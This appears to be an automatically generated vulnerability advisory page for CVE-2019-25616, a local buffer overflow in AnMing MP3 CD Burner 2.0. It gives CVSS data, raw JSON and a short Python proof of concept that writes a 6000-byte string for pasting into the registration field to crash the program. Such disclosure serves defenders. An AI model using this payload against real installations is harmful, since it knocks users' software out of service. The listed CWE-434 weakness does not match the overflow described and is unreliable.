Security Vulnerability Report
CVE-2019-25616 CVSS 6.2 MEDIUM

Published: 2026-03-22 14:16:30
Last Modified: 2026-04-16 16:19:51

Description

AnMing MP3 CD Burner 2.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized string. Attackers can paste a 6000-byte payload into the registration name field to trigger a denial of service condition.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

AnMing MP3 CD Burner 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

# PoC for CVE-2019-25616 - AnMing MP3 CD Burner Buffer Overflow
# Generate a payload of 6000 bytes to trigger the crash
def create_dos_payload():
    padding = b"A" * 6000
    try:
        with open("cve_2019_25616_payload.txt", "wb") as f:
            f.write(padding)
        print("[+] Payload file 'cve_2019_25616_payload.txt' created successfully.")
        print("[+] To exploit: Copy the content of the file and paste it into the 'Registration Name' field.")
    except IOError as e:
        print(f"[-] Error writing file: {e}")

if __name__ == "__main__":
    create_dos_payload()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25616", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:30.307", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AnMing MP3 CD Burner 2.0 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an oversized string. Attackers can paste a 6000-byte payload into the registration name field to trigger a denial of service condition."}, {"lang": "es", "value": "AnMing MP3 CD Burner 2.0 contiene una vulnerabilidad de desbordamiento de búfer que permite a atacantes locales bloquear la aplicación al proporcionar una cadena de tamaño excesivo. Los atacantes pueden pegar una carga útil de 6000 bytes en el campo de nombre de registro para desencadenar una condición de denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "http://www.ddz1977.com/", "source": "[email protected]"}, {"url": "https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46754", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/anming-mp3-cd-burner-local-denial-of-service", "source": "[email protected]"}]}}